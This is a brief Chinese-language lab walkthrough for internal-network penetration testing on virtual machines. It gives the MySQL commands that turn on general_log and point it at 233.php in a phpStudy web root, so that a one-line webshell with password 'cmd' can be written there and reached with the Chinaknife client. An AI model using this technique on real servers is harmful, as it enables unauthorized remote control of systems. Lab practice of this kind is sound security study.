内网横向渗透测试
环境准备
1、虚拟机1:windows7:两张网卡,一张连外网,一张连内网
2、虚拟机2:server2003
3、虚拟机3:server2003
开始渗透
1、扫描端口
2、phpStudy 探针(可以看一下是否有可以利用的信息)
3、使用3Kb工具扫描
4、执行命令,查看日志状态(是off的话,需要改配置文件)
命令:show variables like '%general%';
5、执行命令(SET GLOBAL general_log='on')后在查询
6、执行命令,在WWW目录下生成一个233.php文件(SET GLOBAL general_log_file='C:/phpStudy/www/233.php')
7、把一句话木马写入233.php文件中(一句话木马的密码是:cmd)
8、使用菜刀进行连接